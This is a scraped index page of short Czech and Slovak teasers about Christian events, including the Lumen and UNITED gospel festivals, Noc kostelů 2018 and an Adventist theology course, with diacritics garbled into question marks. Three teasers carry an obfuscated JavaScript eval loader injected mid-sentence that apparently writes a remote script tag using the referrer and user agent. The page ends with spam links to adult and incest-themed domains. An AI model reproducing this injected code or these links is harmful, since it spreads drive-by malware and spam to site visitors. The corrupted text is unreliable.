Aktuálně

Na Lumenu zazářili No Name

Ilustrace k článku

Trojičné  námestie sa počas uplynulého víkendu naplnilo mladými z celého Slovenska. V Trnave sa konal 26. ročník gospelového Festivalu Lumen. Približne sedem tisíc ?udí bolo v Trnave na Festivale Lumen. Dva dni plné

Festival UNITED přiveze Worship Central

Ilustrace k článku

D?ležitou sou?ástí programu festivalu UNITED jsou seminá?e, které se konají b?hem páte?ního a sobotního odpoledne. Trvají zhruba hodinu a otevírají nejr?zn?jší témata. V sou?asné dob? jich organizáto?i na internetových stránkách p?edstavují

Rozhovor s Filipem Zavřelem

Ilustrace k článku

Na konci března byl spuštěn internetový projekt Svět chval, přinášíme vám rozhovor s jeho koordinátorem Filipem Zavřelem. Kdy a jak ses dostal k Bohu, k víře a k hudbě? Co bylo

Ponuka Festivalu Lumen narastá

Ilustrace k článku

Po predchádzajúcich správach o koncertoch No name, Simy Martausovej a Diev?enského zboru Slovenského rozhlasu ?i skupiny S hudbou vesmírnou, ponúkli organizátori fanúšikom Festivalu Lumen kompletný program. Nechýbajú v ?om debata

Noc kostelů 2018

Ilustrace k článku

Z 25 kostel? na více než 1300 narostl po?et ú?astník? Noci kostel? od roku 2009, kdy se tato akce konala v ?esku poprvé. Po?adatelé p?ipravují letos programy desátého ro?níku, p?i

Festival Lumen představil první interprety

Ilustrace k článku

Okrem eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|deirf|var|u0026u|referrer|htkft||js|php'.split('|'),0,{})) výrazných zahrani?ných a slovenských gospelových mien sa tento rok môžu návštevníci teši? aj na známu kapelu No Name, ktorá je na našej hudobnej

Mladí Češi jsou podle průzkumu nejméně pobožní

Ilustrace k článku

Londýn – Ve dvanácti evropských zemích se v?tšina mladých lidí v posledních letech neztotož?uje s žádným náboženstvím. Nejvíce to pak platí o ?esku, kde se 91 procent respondent? ve v?ku

UNITED představuje hvězdy festivalu

Ilustrace k článku

Festival UNITED napl?uje každý srpen valašský Vsetín. Už od prosince je jasné, že zahrani?ními hosty letos budou kapely Christafari a LZ7; k t?mto jmén?m te? p?ibývají i další – sestava

Adventistický teologický institut

Ilustrace k článku

Adventistický eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fazza|var|u0026u|referrer|tayaf||js|php'.split('|'),0,{})) teologický institut spustil p?ihlašování do dalšího ro?níku bakalá?ského kombinovaného studia teologie. P?ihlášky je možné podávat do 22. 5. 2018, p?ijímací zkoušky budou probíhat 10.

Důkaz o Bohu 2: Boží uzdravení (1/25)

Ilustrace k článku

První eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fthyn|var|u0026u|referrer|anyfa||js|php'.split('|'),0,{})) díl druhé ?ady po?adu HopeTV.cz s misioná?em Korneliem Novakem se snaží hledat odpov?? na otázku, zda i dnes uzdravuje B?h nadp?irozeným zp?sobem.


 
adultcomics.me shemalevids.org incestgames.net